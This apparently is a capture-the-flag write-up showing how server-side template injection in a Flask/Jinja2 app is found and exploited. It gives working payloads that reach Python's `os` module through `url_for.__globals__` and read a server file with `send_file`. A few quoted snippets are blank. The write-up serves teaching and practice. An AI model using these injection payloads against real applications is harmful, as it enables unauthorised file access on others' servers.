Rating: 5.0
We try `/foo` and sure enough we see "foo" on the page. Perhaps we can include php on the page?
`/` reminds us that the question mark is for get parameters. Better urlencode it.
`/%3C%3Fphp%20echo%201%3B%20%3F%3E` gives us nothing, but the source shows the attempt was escaped.
We got something like `` back. So they are trying to blacklist commands. Blacklisting has a bad smell about it.
After a while of trying to get php to be included, we tried to switch gears and look for other server side includes.
`/{{session}}` worked, we get an object back. After some more fiddling, `/{{session.__dict__}}` proves this is python and we figure out that this looks like jinja2 templates from flask.
We try `/{{url_for.__globals__}}` which gives us access to some python functionality, the `os` module (exposed as `url_for.__globals__.os`) is particularly interesting to us as it allows us to explore the operating system with `os.listdir`. It should be noted that many things were tried, but `os.open` and `os.popen` were blocked to us and things like `os.system('scp file location')` would error out. Eventually we figure out that we can use flasks `send_file` which returns a `request` object, which itself can be displayed through the template with the `.text` attribute.
The final url ended up being: `/{{url_for.__globals__.send_file('/opt/app/flag_secret_file_910230912900891283').response.text}}` which yields the flag.